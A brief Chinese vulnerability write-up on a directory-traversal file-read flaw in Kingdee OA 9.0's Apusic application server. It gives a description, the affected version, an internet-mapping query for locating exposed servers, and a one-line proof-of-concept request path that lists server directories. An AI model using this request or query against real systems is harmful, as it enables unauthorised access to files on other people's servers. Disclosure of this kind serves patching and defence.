金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞

漏洞描述

金蝶OA Apusic应用服务器(中间件) 存在任意文件读取漏洞,攻击者通过漏洞可以获取目录下的文件信息。

漏洞影响

金蝶OA 9.0 Apusic应用服务器(中间件)

网络测绘

app=”Apusic-公司产品” && title==”欢迎使用Apusic应用服务器”

漏洞复现

20240309184323980-1629466520262-6fed551f-2c99-4966-82df-a2c5550a216d.5acfc0d3_2024-03-09_18-42-50

验证POC

/admin/protected/selector/server_file/files?folder=/

20240309184424872-1629466554121-8f3d039e-9243-42c1-bd3e-65cdbba62569.fe800ebd_2024-03-09_18-43-58

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容